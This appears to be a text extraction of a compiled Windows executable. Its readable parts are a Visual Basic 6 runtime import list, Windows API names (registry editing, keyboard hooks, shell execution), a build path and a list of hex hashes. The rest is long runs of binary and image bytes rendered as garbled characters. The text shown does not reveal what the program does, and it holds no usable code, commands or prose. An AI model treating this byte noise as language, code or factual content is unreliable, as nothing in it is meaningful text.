8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE| }P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
3964344A5F101BBA10AF84388155DFBD
1FD3607D4327B50EB6EDDABE78C6FA87
D1B2D8671EFC317E434137437EEF4A96
370027142FF336DDB2EE9E351C47EDA5
D47BD13313C220FC81E2540FDD038E6A
4C247094201EB65DE12AA17F20575ED9
7EAE529F10C8EA87C8CADCC469D1CE76
CE9ADAC29177BF143E24B1BCE2A0859C
5BB894201EF96C9C75AE3F22DD9BEB74
B3238B574B3390358ED3AC8F60226CCD
9FEBFDDC3BFD3D2FCB45F7F1D8FF39E7
199350BB6558935F20C7C2ACB1D2A315
065AC7FCDA71AF7905F67307B1E0131F
184806EBCFA7D9D66674D0362DFDA9FC
B30CD0A83AF9B887FDCB16B4059078D4
0D4261D61956CCBFEC24C5D476B6C801
25A99EB4214CFE27E51E3F9CD7097407
E24026E736358CD755DF447A99406D3A
HH;s+]
SV393u
WuuSMuuuSM,u
uuSMPuuSMptSl|uSx
MMJMMM*M_M^[d
SW39 tb9_
t]V]]WM]
SW39 tb9_
t]V]]WM]vj
SW39 tb9_
t]V]]WM];j
SV393th9s
tcuuSMuY9s$t@j
t>EEVMEqE
(VW39>t^9~
tY}}VM
}}}VME
1`7_^U
187_^-
PQ _|%f}
NYYu^]
Sn_^[]
VVMF$t1D
9u_N$t
VVM=F,
<uN,_t
VVM2F0t-
SCYYPu
P+PS$u
S3V^8^<^@W=T
^$^(^,^D^H^L^P^T^X^\^`^d^h
Xlh@Pj\X=~
Xl[h@Pj\X~
;}/Php
SW39;}
}}SM}9{
X]LTD8<P4E
TT;|gPh
T1;|DT;t
SVWXE3Vh
XuPTH@DS<E
SVWE+3Vh
G$Ph\2
G(Ph@2
G,Ph(2
p[$;th38j
Y}83t4u9HE
SVWXE3Sh
TY|?Tt
9U>_^J
9-N 9#N
VW39>tR9~
tMS}}VM}E
VW39>tR9~
tMS}}VM}mE
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}E
SVWXE3Vh
VW39>tR9~
tMS}}VM}E
XEH3Sh
X]PTH48@0E
;|\9Tt\T@D
;|DT;t
DWXH3Sh
3;@tcH@`
;|DT;t
VWWMjw
MtFW>p
SVWXEH3Sh
WT;|DT;t
SVWXEO3Vh
XuPTH<@S8E
VT|FTt
SVWXE 3Wh
F Ph4E
T |?Tt
TWXE-3Ph
XEPHTVhtF
3Dt^Dp
PTW;|FPt
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}}E
SVWXEG3Sh
X]TPLD
;|A9DH
b|M_^d
L@[L;t
;|N9LtRL@L;t
VW39>tR9~
tMS}}VM}
UQQSV5
VVPVPVVVVVV
PSPVPP
;u?SVP
M_^[T(
S4PW0,
;YtajfY3
,S4P,0
SVW3S8QLQS<QEE
,PHPSh?
SLPSP0
;u`@S8PLPS<PP@D8<
QQWVWWWPh
jd4PjdWh,
PPWVWWW
Yu3YYu
iM_^[b
It{It9I
u`Y3@M_^[s
UQVWju
f}@5po
Wj'Y3d
Wj'Y3df!ldPj
VEP3EPVh?
uYEPEPEPVu
uGEPEPEPVu
UQSVWPo
3Ct&90t
EPShhL
EPShDL
EPShhK
EPSh<K
Ht}HtfHtOHt2Ht
S3VW]]o
]*]]]VME
uM6VMZ^5
M]A^MM\M_^[d
UQV3VEPVh
SV3f90u
utGf=#
f;u9uu#S
f;u3f;.uu>
Y?nt6Ht
VXPjdj
ZXXZ3@^
SVXEqm3j
D8PHSa
D38Q@PWTL
DX8QPWTL
DX8QPWTL
X8QPWT
D8PSWT
D38Q@PWTL
DX8QPWTL
DX8QPWTL
DX8QPWTL
X8QPWT
P4WTSPh
4PPWTPh
SuPHPh
VWXTcjd_
SXP3hl
H<PVLa
H3<Q@PWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
X<QPWT
VWXT\ajd_
H<PVLa
H3<Q@PWTP
HX<QPWT
HX<QPWTP
HX<QPWT
HX<QPWT
HX<QPWT3C@P
X<QPWT@
<8O<D0QPhM
@PqG|2F
VS^_3[]
VWEZ3X}uZ`jZ_ZTZ(IZ
((7F&F
FXXEEM_d
SVWXEX3}XWWh
S!t!xho
SW3EX\ho
T}J<;u
=((=XX=
=``n=]=MT
VXE.P3j
*9;u)E
y4XX7_[Md
VXEJ3j
#4;u)HE
3;v:9,
XPt 9(
3+tSHt=Ht'Ht
?3_[Md
PQXP E
H@@<RQP
XTI@5|o
@4PDSa
@34Q@PWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
X4QPWT
PLWTSPh
LPPWTPh
SuPHPh
tKWPhI
X6PXP$09H
vLWPhQ
XP4XP,9x
vLWPhJ
XPXP|,9
vLWPhK
XPXP(,9
vLWPhL
XP8XP,`
#tiWPhM
XPXPc
#XX#M^d
XT63SjdX]W"j
tVWXPhN
t!tVWXPhO
PTXPV|
!tOWXPhP
QTPP09Lt0WXPh[
PTXPV @]b X
t!M_^d
WXT(A4F
(v1Wjd(E
4/X}&/E
VPjdWkX
VXPjrW[X
j0d5po
VXPjdWW
VPjdWE
VXPjrW%W
j0d5po
3@M_^d
VXPjdWE
$`Y`VPhs
VXPjdWE
,j0d4W
X/)($)
V(PjdWE
j04dW
SVW33G;EE
xPPtPS|t
(&]&&X&
V(PjdSE
(R#X}D#9#
3@M_^d
W3WS S
EPuWSj
3uLPho
PjgYYj
;tc90t_Vj
VPjdS@
}*VXPjrj
j0d5po
VPjdSY?
PP}*VXPjrj
j0d5po
VPjdS&>
P}*VXPjrj
j0d5po
VPjdS<
P;})VXPjrSX<
j0d5po
+tGHt5Ht#Ht
df8hCVXPhO
+VXPhN
V(PjdWE
VPjrWN9
j045po
YY2XX!
(PXch`Q
(PXh`Q
((wXXfM_^d
df0\Ph
uijdhQ
9hv=LPPPTPXPhQ
Vjn[hQ
f04V5po
XX((|``kZI8Md
u<EPSj
UDSVWh
EEP5po
W3WuEP
E+EWPE+EPE+E
EPW5to
+V4YJ\`
+Vs;5``
3_^[;5l`
SWE30}j
f8@@f98uVW
Wd45po
X``UV`Ph
V(PjnW%
Wld5po
9,(t hR
Xb(WV(Ph
V`PjnW#
W4d5po
((JXX9(
P3Vh<L
M3Fx5Ho
VVWUYu\3A9
VVdV5po
vTl3|j
WXPjdVE
Vd5po
jqYYxMh
WPjd3VE
WXPjiV
j0d5po
W(PjdVE
ddP+@j
XXn]L((;3VVh/
;t?95o
SWPj5|o
SXPjlVE
S(PjdV3
PWdPo095
((XXMl
W3WWEE
uK\Ph`
`PWh4S
v*GGf? w f="
dGtpWq
dstpW,
W'@Pj.} =o
&39u 9=o
4PjsWc
NYYShN
t7ShTN
YYShTN
t7Sh(N
YYSh(N
V4Pjd3W
FYYShN
t7ShTN
YYShTN
t7Sh(N
~YYSh(N
twf}66
t7ShTN
YYShTN
t7Sh(N
PYYSh(N
uG`P3PPh
Wdt@Pj d~
lPjfVz
fd[PM_^[w
fDV*^]
_3_^[]
URuPQT|+}
URuPQT|+}
U SVW3S
UREuTq
|P9]tKEP]
PQHE;t
dE{VdXpG
YYu#9`u
YM_^[m
PqXPWV6
W3}X(hZ
`((OXX>-
S df8o
VXWWPX>Yo
;t=PhxU
VX`WWPXXo
;t=PhHU
WWPXXo
VXWWPXlXo
;t=PhT
VXWWPX&Xo
;t=PhT
VXHWWPXWo
;t=PhT
WWPXW9ht_hxT
WWXP(GW4hDT
CdDdPWphZ
804W,E
;LtHXP
P0XPht\
8;t1XQ
PXPh`\
D;t1XQ
PXPhL\
H;t1XQ
PuXPh4\
P;Lu<;
P;Lu8;t+hD[
TD;t+h
TH;t+hZ
XET,23
40TPh^
,YYP;H
SVWXET
P0DPh^
SyYY^W3Gt
t+Ht!Ht
+t+Ht!Ht
YY hPd
PiK -f
Y|jv(T,u
WpVWis
WJ3098
RPTDHQv<Ph0s
YY hPd
VXJOuXP
7v!;hs
XX{M_^d
3SEEEA
E0EPhx
SV3;WE
WVW37(
W/YY hPd
WLVWEs
WYY3M_^d
SVW3;E
@PaPh0
YYt"7h
WSm0Xe
@Pj\y~
y3M_^d
PX4XPhx
PXyXPhx
PX$XPhx
PXiXPhx
P(lh,T
\ 3*qM_^d
E0EPh0
E0EPh0
YY^ltD`
W~VWws
WSYY3_^
PX:zXPh
PXyXPh\
dXXd$b
YY hPd
3((*`M_^d
XHTPrHPhH
PV;YYt
PVh;YYt
PV<;YYt
PX`lHXPh
V@YY h
XPVWV^h
XPViWV
X3M_^d
WXTDk3
Hu3d(hh
TYYh,T
nT``]T\
T#YYh,T
SS((SXXSM_^d
ZN48V0E
NLPVHE
NptVlE
2O@DV<E
hO(,V$E
OdhV`E
PX\VTE
|q!|^%|K=Pq
Wffffff
YY]j`h
3{FF3f
FFW](j
w\SVP9
YE;t:FHE;r
9}uX;u
E;t0FHE;r
9}u";u
EE;u`9=t
3CSVW5`
UQQSVWd5
SVWE3PPPuu
E_^[E]
USVWUj
P(RP$R
t5|$(t
;t$(v(4v
UQPXY]Y[
@@fu+E
fSt8+f
@@fu3[_]
@@fufM
HLNLHPNPP3Y`
vPVLPQE
Y3^_[]
AABBM
tJf9}tDf9Et<}
3F95xr
3MYY[]
31YY[]
SVEW3;
@u+@<v)P
UQSVW>
<"u>"u
3Y[^_5Xr
@B8\t8"u&
UQQSVW39=
W33;u.
;tuf9 t
SSS+S@PWSSE;
;YEt!SSuPuWSS
uGY]]W
;rSVWEP
YYt(V5
PYF,;t
PYF4;t
PYF<;t
PYFD;t
PYFH;t
PYFT=pa
Y}F`E;t
FdE;tM
YYt+V5
3@^p3^
3]3@]h
+SVWEePEEEEd
Y_^[QVC20XC00U
33333]^]
]_^[]UL$
f;rof=p
f;r_f=Z
f;rOf=
rBPf;rAf=*
f;r1f=J
f;r!f=
3"p@d;
VDYYFu
WYYuf_]h0
PyYYtF
YYGG3f
YfdtSfitMfotGfxtAfXu
1ht lt
g~Bit!n
(j-_f;u
YtdV(PW
GGf?^u
f]t`FFf9s
jx^f;tZfXtT
S~YYj0[
ptBuf%
F$|3@_^
k3Y@_^]
W3;u4DP
MOI;|9 M
WI <}}
MLD3#um
#Mj _^{
;]r;]u&
]#\D\D
FF@@u3
YYE@xE@|EpxM
EE8csmu%Ex
EPQ3VW
GuRYMHxMH|>csmu6~
t u$u u
WEPEPVu u
;EsVS;7|B;w
;Er[_^
Wcsm9>
}EPEPWu u
(u$u ]u
VYY_^[
u u$u uu
tP8csmu,9x
U$Ru u
P 3@_^]j
VW_^]M
It7ht<
HHtxHHtt
@@@u3@t
t-RPWS
CYCY~9PM
PvCC>Yt
j ^f;r
It6ht<
}]UZtg
@@@u3@t
t-RPWSH/
uH80t8
A80t.F
EVM(^[
uMSW<t
D=VP YYtG;|fE
YYM_^[@=
r$$w @
W=YEMT
tc;t_F,98uXF4;t
YYF0;t
YYv,}v<uYYF@;
PZvDRYYFP;
vP+YYV#Y_^]
3;t/A,
QoYFd^j
W>+~'WPv
7Y}3u;5@
tVPVDYY3BU y
qtb+tG
VbtFHt+
Y]3u;5@
4VYY y
GIt%t)
Gt/KuD$
GKu[^D$
VPVPV5v
@;rD3Ar
@;vAAy
YE;uo>
EtVMf9MZ
_^[j$h
33F9=lu
u2EPVh|
M3F]39}u
SVeYYE;tuWWSuu
P}YEtnu
fNPSuu
E_WEPE
UDSVWj
E3;}M]
@@Ju;t
;tD9]u?8\
EPSRWjQSv
M_^[.x
BG;U|E
EPSSSjQSv
;F(r(8_
t#F(39]
DDDDDDDDDDDDDD
;|P+;E
ue9t-j
*09)Y+
s 9~(~
j Yj Y+
VWj Y}
Pj Y+3BR0H%
Yj ^+3B
QP4YYu
<+3E_^[
|3@]3]
SVWj ^]
EPEPEWPv
@PEP 3;>v
|!3}MEP^
fYY3j Y+N
3QQQEE
QPEPEP#
EVPM$^vh
3QQQEE
QPEPEP#
EVPdM$^.h
tAt2t$
@u+@PWV
EPVcM s
u5SSWh|
E SSSSu
]M3G9]u
YE;t}SSuuu
e33Mu;u
V?Y;thE
WreY9]t
ev$dv(dv,dv0dv4dv
dv8dv<d@v@dvDdvHdvLdvPdvTdvXdv\
dv`wdvdodvhgdvl_dvpWdvtOdvxGdv|?d@
PWcY^]
PbYv$Dk
VtbY^]UV3PPPPPPPPU
u5EP3GWh|
V`YEn}
e}UWVSM
[^_UV3PPPPPPPPU
t78t2=`
3@_^[]
PYYtbF
EEuzEE
YXS9YtJU
t1SaYP
t@ t20t$@t
/t(;t$;t
8EPuuu
uWEY>j
u|Yj4h@
u8WW3FVh|
YE;t@E
t!SS9]
u1VY9]t
E;tWWu
EPSu u
YMMjDhh
39}t WWu
tjEEb9}u
WWWWVSWu
;tG3Vj
YYE;t43WWVPVSWu
HHtjHHtF
u9S\UC\
}]39Mt
WVE;Yu
;VWEN@
vOE}SLSFEPSS6E
EMu39S
tfEM_^fC
+t5-t00
uFQ3@}
G0t1|
HHu&Mj
PQYuuO
#fEEEEEEEEEEEE?E
PEPfU}Y
EPMYu}
EPNYuO
EPoEPfEPEPEPPEM
0H;s;s
@UWVSu
F'G8t,A<
WN^xd;=g
tXSjYe
EPKYu}
u5}u,e
MuVQTYYM39U
6UWVSM
B8t6t8t't
M}M}M3~M~M~M#
M{M|@F
g~X\~`Q~F~;~(0~
~|UzpzG{LG
Tuy}`}}X}(}}G
Xt}y^}G
X }qzy|<H
X|@izH
(|Xu|j|_|XT|I|X>|3|X(|
x({{X{X{({lI
({{{p{Xe{I
(K{X@{5{I
w(]zRzJ
8zX-z"z K
z(yyy\K
yyy`y(yXyK
|y0qyfy[y(PyXEyX:y`/y$y(
y(xx`x<L
xmtXxxWtxXxxuxtX{xpx(exZxOxXDxxsltL
wwXw(wwPM
uOuX7wM
w`v(vXv
(vXwvlvN
XRvXGvN
X-v("v
q0qH&rlsr
s$Zs`sxsT#
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegEnumValueW
RegQueryInfoKeyW
RegOpenKeyExW
RegQueryValueExW
RegEnumKeyW
RegEnumKeyExW
RegDeleteKeyW
RegFlushKey
RegDeleteValueW
RegNotifyChangeKeyValue
ADVAPI32.dll
lstrlenW
EnterCriticalSection
InterlockedIncrement
LeaveCriticalSection
InterlockedDecrement
GetSystemDirectoryW
GetCurrentDirectoryW
InitializeCriticalSection
GetFileAttributesW
GetModuleFileNameW
DeleteCriticalSection
CloseHandle
HeapFree
HeapAlloc
GetProcessHeap
lstrcpyW
lstrcmpW
GetWindowsDirectoryW
CompareFileTime
lstrlenA
GetVersionExW
WaitForMultipleObjects
WaitForSingleObject
SetEvent
GetCurrentThreadId
FreeLibrary
LoadLibraryW
GetCommandLineW
CreateEventW
GetSystemInfo
GetFullPathNameW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoA
GetCommandLineA
GetVersionExA
HeapReAlloc
RtlUnwind
ExitThread
TlsSetValue
TlsGetValue
GetLastError
CreateThread
ExitProcess
GetProcAddress
GetModuleHandleA
WriteFile
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
TlsFree
SetLastError
TlsAlloc
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
HeapSize
LoadLibraryA
GetACP
GetOEMCP
GetCPInfo
InterlockedExchange
VirtualQuery
GetStringTypeA
GetStringTypeW
VirtualProtect
MultiByteToWideChar
IsBadReadPtr
IsBadCodePtr
SetFilePointer
LCMapStringA
LCMapStringW
GetLocaleInfoA
SetStdHandle
FlushFileBuffers
CreateFileW
SetEndOfFile
ReadFile
KERNEL32.dll
GetTextExtentPointW
GDI32.dll
EnableWindow
SendMessageW
GetDlgItem
MessageBoxW
LoadStringW
wsprintfW
EndDialog
DialogBoxParamW
GetWindowLongW
CallNextHookEx
PostMessageW
IsWindowEnabled
GetKeyState
DestroyWindow
MessageBoxA
wsprintfA
LoadStringA
SetDlgItemTextW
ShowWindow
CheckDlgButton
SetWindowTextW
ReleaseDC
SetDlgItemInt
GetDlgItemInt
GetDlgItemTextW
CheckRadioButton
LoadIconW
SetForegroundWindow
KillTimer
SetTimer
SetFocus
GetFocus
SetWindowPos
AdjustWindowRectEx
GetWindowRect
CreateDialogParamW
GetClientRect
UpdateWindow
PostQuitMessage
UnhookWindowsHookEx
SetWindowsHookExW
DispatchMessageW
TranslateMessage
IsDialogMessageW
PeekMessageW
MsgWaitForMultipleObjects
GetDesktopWindow
USER32.dll
ImageList_Destroy
ImageList_ReplaceIcon
ImageList_Create
COMCTL32.dll
GetSaveFileNameW
comdlg32.dll
ShellExecuteW
SHELL32.dll
CoInitializeSecurity
CoInitialize
CoCreateInstance
CoUninitialize
ole32.dll
OLEAUT32.dll
I x@oGAkU'9p|B
~QCv)/&D(
uuvHMXB
9;5SM]=];Z] T7aZ%]g']
?Zd;On
7?3=Bz
;1az?aUY~S|
D?$?9'
*?}d|FU>c{
zc%C1<!8G
u7.:3q
#2IZ9W
,%I-64OSk%Y
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
